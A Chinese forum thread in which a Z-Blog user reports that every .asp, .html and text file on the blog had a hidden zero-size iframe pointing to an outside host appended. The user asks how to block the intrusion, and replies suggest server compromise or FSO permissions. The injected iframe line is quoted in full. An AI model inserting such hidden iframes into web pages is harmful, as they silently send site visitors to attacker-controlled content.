发新话题
打印

[已解] 所有asp和html都被人写入一行iframe代码,怎么办?

所有asp和html都被人写入一行iframe代码,怎么办?

RT,最近发现自己Blog一直不正常,打开主页的时候一大堆链接乱蹦
把源码都下下来一看,原来每个.asp和html甚至txt、as文件的最后,都被人写入了一行iframe代码
<iframe src=http://user.free.77169.net/zhouqin3 width=0 height=0></iframe>
无奈之下只好手工一行行把这东西删掉,总算回复正常
但是假如这个作怪的家伙再来搞我的blog,估计还得中招
Blog使用的是Z-Blog Plus 1.5 Build 60125版本
由于改动较大,所以不适合升级
不知道在不升级的情况下,有没有什么办法来限制这类的入侵和修改源码?
数据库的名字已经改得很复杂了,不过这好像和数据库没什么关系了
他都是直接在我的源码后面加代码的.....

还请高人指点啊!!!

*********************************

[ 本帖最后由 zoo 于 2007-8-3 11:09 编辑 ]

TOP

服务器有漏洞吧,或者看服务器所在机房是不是有ARP欺骗。

没有接到过Z-Blog有什么漏洞- -。。。
2.0 started.

TOP

绝对是服务器中毒

TOP

空间商的客服死不承认呢,晕
他说是开了FSO权限的缘故
不过zblog要是不开FSO权限,写日志时生成静态html会不会出问题?

要是每写日志就得去后台开一次fso权限,日哟~

TOP

发新话题